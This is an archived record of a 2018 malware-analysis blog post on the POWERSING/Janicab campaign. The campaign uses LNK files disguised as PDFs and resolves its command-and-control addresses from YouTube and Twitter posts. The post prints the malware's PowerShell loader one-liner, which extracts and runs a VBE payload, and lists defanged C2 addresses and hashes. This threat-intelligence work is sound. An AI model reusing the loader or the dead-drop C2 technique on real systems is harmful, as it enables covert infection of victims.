{
	"id": "d2cff49e-1aef-4e9d-90ee-61b7d7db0b8f",
	"created_at": "2026-04-06T00:15:30.408984Z",
	"updated_at": "2026-04-10T13:11:29.302159Z",
	"deleted_at": null,
	"sha1_hash": "abdebb50201dd5cc1667325c5ee413e31b23c0f2",
	"title": "POWERSING - FROM LNK FILES TO JANICAB THROUGH YOUTUBE \u0026 TWITTER",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 241271,
	"plain_text": "POWERSING - FROM LNK FILES TO JANICAB THROUGH\r\nYOUTUBE \u0026 TWITTER\r\nBy Mo Bustami\r\nPublished: 2018-12-13 · Archived: 2026-04-05 13:21:37 UTC\r\nINTRODUCTION\r\nThis post will discuss an ongoing campaign that have been operational since at least August 2017. The post will look into the\r\ndelivery of the malware, some analysis on the payload, and some additional insights in relation to the campaign. It is by no\r\nmeans a full in depth analysis of the malware and all it's functionality. \r\nLAWYER UP!!\r\nThis all started with a tweet by the AWESOME Jacob Soo (@_jsoo_) whom I recommend you go and follow if you are\r\ninterested in analyzing malware and tracking different threat actors.\r\nThe sample is a ZIP file titled \"Dubai_Lawyers_update_2018.zip\" and the archive contains two LNK files that are\r\nperpetrating to be PDF files. The actors in this case borrowed couple of files from the British Embassy site and used them as\r\ndecoy documents to lure victims into believing that these files are in fact legitimate.\r\nhttps://assets.publishing.service[.]gov.uk/government/uploads/system/uploads/attachment_data/file/754075/Dubai_List_of_Lawyers\r\n_Nov_2018.pdf\r\nI took the time to analyze the sample and it seems that it does the following:\r\nThe LNK files contain BASE64 strings that once decoded will show some hard-coded URLs. We will get back to this\r\nin a moment\r\nhxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxps://youtu[.]be/40rHiF75z5o,\r\nhxxps://brady4th[.]wordpress[.]com/2018/11/15/opener/ ,hxxps://twitter[.]com/Fancy65716779,\r\nhxxps://plus[.]google[.]com/u/0/collection/U84ZPF\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 1 of 6\n\nLNK contains a small PowerShell script that creates a VBE file\r\n\"/c powershell -c \"$m='Dubai.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp $m $t\\$m;$z=$t+'\\'+@(gci -\r\nname $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];\r\n[io.file]::WriteAllbytes($t+'\\.vbe',$q);CsCrIpT $t'\\.vbe'\"\r\nVBE file once decoded is responsible for:\r\nCreating the Decoy PDF document\r\nCreating a PowerShell script from chunks of code within the original LNK file.\r\nRunning that PowerShell Code\r\nThe resulting PowerShell script is also obfuscated. Once decoded, the script, which is over 900 lines, which I am\r\ncalling POWERSING acts as the main payload and construct a dll to run the main functionality of the malware.\r\nSINGING KEYBOARD - FROM YOUTUBE AND TWITTER TO ATTACKER COMMAND \u0026\r\nCONTROL\r\nIf we visit some of the URLs that are hard-coded within the LNK samples we will notice a recurring theme that all of them\r\nhave a string that look like this\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 2 of 6\n\nThe POWERSING code seems to instructs the victim machine to go to different hard-coded sites (Youtube, Twitter,\r\nGoogle+, Wordpress, etc) looking for a specific string\r\n\"Yo bro i sing\" + BASE64 encoded String +  \"My keyboard doesnt work..\" + String of enocded/encrypted\r\ncharacters.\r\nBased on this, I was able to find additional links and sites which are probably related to the same campaign. \r\n1. Google Results - hxxps://www.google.com/search?\r\nq=%22Yo+bro+i+sing%22+%2B+%22My+keyboard+doesnt+work..%22\u0026filter=0\u0026biw=1536\u0026bih=723\r\n2. Youtube Results - hxxps://www.youtube.com/results?\r\nsearch_query=%22Yo+bro+i+sing%22+%2B+%22My+keyboard+doesnt+work..%22\r\n3. Oldest Youtube Video with such code is from over a year ago - hxxps://www.youtube.com/watch?\r\nv=1jrvJD2uKjM\r\n4. Twitter Results - hxxps://twitter.com/search?\r\nq=%22Yo%20bro%20i%20sing%22%20%2B%20%22My%20keyboard%20doesnt%20work..%22\u0026src=typd\r\n5. Reddit Post - hxxps://www.reddit.com/user/brain-fart-yo/comments/9ypxgk/warming_up/\r\n6. Imgur - hxxps://imgur.com/t/ily/36tbM2J\r\nThe POWERSING code included a function (LongtoIP) that seems to take the Base64 chunk from the above string, decodes\r\nit and run some mathmatical equations on it to produce the real C2.\r\nBased on this, I was able to calculate 4 different potential C2 servers from the different comments and links I found\r\n54.38.192[.]174 – Most recent, from around Mid Nov\r\n91.229.76[.]153\r\n105.104.10[.]115 – Oldest, from Aug 2017\r\n52.67.106[.]251\r\nThe first two IP addresses seem to have shared the same SSL cert as shown below\r\nimage.png\r\nUNCOVERING ADDITIONAL SAMPLES\r\nI wanted to see if I can find additional samples that could be related to this campaign and after some more digging, I found a\r\ncouple of older samples going back to Nov 2017.\r\nSAMPLE 1 - ITW name: p2_ecamos_Volatility_Strategy_2X[.]pdf.lnk\r\nHASH - e91f0189ed04972ce71fd10631e8830c585908089a38a05a12bd4e43d6e21024\r\nCurrent Detection – 0/59\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 3 of 6\n\nSAMPLE 2 - ITW name: ecamos_Volatility_Strategy_2X[.]pdf.lnk\r\nHASH - 0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f\r\nCurrent Detection – 0/59\r\nEcamos seems to be an Investment company off of Switzerland (hxxps://www.ecamos[.]ch/en/)\r\nThe lure is taken from this most probably:\r\nhxxps://www.ecamos[.]ch/downloads/ecamos%20Volatility%20Strategy%202X_factsheet_2018%20November.pdf\r\nThese samples had these hardcoded URLs:\r\nhxxp://shockchan[.]com/2-girls-1-cup-video/\r\nhxxps://twitter[.]com/sabinepfeffer69/status/928607342177988608\r\nhxxps://mads281.wordpress[.]com\r\nhxxps://www.youtube[.]com/watch?v=ZRQ-1I856XA\r\nADDITIONAL INSIGHTS AND FINAL THOUGHTS\r\nWhen I first started looking into this I reached out to few peers to get their insights and their expertise and I was not\r\ndisappointed as some of them provided valuable information:\r\nCALCULATING THE C2\r\nIn relation to the function responsible for calculating the potential C2 IP addresses, we noticed that 2 values when divided by\r\n(25835) does produce an integer and have a decimal point. Keeping in mind that based on the variable types identified in the\r\nfunction, the calculated result will just drop the decimal point; we still wanted to look into potential divider that would\r\nproduce an integer.\r\nBase64: NDU2ODcyODgyNzE4Nzc=\r\nDecoded: 45687288271877\r\nFactor Pairs: (1, 45687288271877) (7, 6526755467411) (29, 1575423733513) (203, 225060533359) (2099, 21766216423)\r\n(14693, 3109459489) (60871, 750559187) (426097, 107222741)\r\nCalculated C2 IP: 185.86.150[.]33\r\nBase64: MjI2NTI5OTQyOTg5Nzc=\r\nDecoded: 22652994298977\r\nFactor Pairs: (1, 22652994298977) (3, 7550998099659) (7, 3236142042711) (9, 2516999366553) (21, 1078714014237)\r\n(27, 838999788851) (63, 359571338079) (189, 119857112693) (2099, 10792279323) (2339, 9684905643) (6297,\r\n3597426441) (7017, 3228301881) (14693, 1541754189) (16373, 1383557949) (18891, 1199142147) (21051, 1076100627)\r\n(24413, 927907029) (44079, 513918063) (49119, 461185983) (56673, 399714049) (63153, 358700209) (73239,\r\n309302343) (132237, 171306021) (147357, 153728661) (170891, 132558147) (219717, 103100781) (396711, 57102007)\r\n(442071, 51242887) (512673, 44186049) (659151, 34366927) (1538019, 14728683) (4614057, 4909561)\r\nCalculated C2 IP: 91.229.77[.]77\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 4 of 6\n\nInterestingly, these two IP addresses shared hosting an SSL certificate which even make the potential that this is related to\r\nthe same campaign even more as shown below\r\nRE-INTRODUCING JANICAB\r\nAs I was writing this post, I was pointed toward a blogpost that talks about a malware called (Janicab) that shares a very\r\nsimilar, almost identical TTP and the samples I found could be variants of such malware or using same functionality/code:\r\nhttps://www.f-secure.com/weblog/archives/00002803.html\r\nhttps://www.f-secure.com/weblog/archives/00002576.html\r\nThis is the first I actually hear of “Janicab” so I don’t have much info about it other than it seems to be cross platform (Mac\r\nand Windows). The F-Secure posts above covers it in detail and provide more information about it's capabilities.\r\nRunning additional searches looking for ”Janicab” returns more samples that share more similarities with this campaign. If\r\nthis is indeed related to the Janicab family/operation, that shows that this malware/operation has been going on since at least\r\n2013.\r\nINDICATORS OF COMPROMISE\r\nLNK FILES RELATED TO POWERSING\r\nf4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af\r\n880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870\r\n22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c\r\n4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840\r\ne91f0189ed04972ce71fd10631e8830c585908089a38a05a12bd4e43d6e21024\r\n0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 5 of 6\n\nRECENT JANICAB LNK SAMPLES\r\n621e256d1db0dd41eef73d2dfe8b7db3cde337dce8037c46c6f5fa7e9ce33135\r\n5039e8f97dc499fef344b56270ae534a0cea1c93ddacf17ae46c7f922f6139d8\r\n01960de7c05329b2b8f6e838cdc02c676782b7954d2ff68d8165d412054ce034\r\nPOTENTIAL POWERSING C2\r\n54.38.192[.]174\r\n91.229.76[.]153\r\n105.104.10[.]115\r\n52.67.106[.]251\r\n185.86.150[.]33\r\n91.229.77[.]77\r\nSource: https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html"
	],
	"report_names": [
		"powersing-from-lnk-files-to-janicab.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434530,
	"ts_updated_at": 1775826689,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.pdf",
		"text": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.txt",
		"img": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.jpg"
	}
}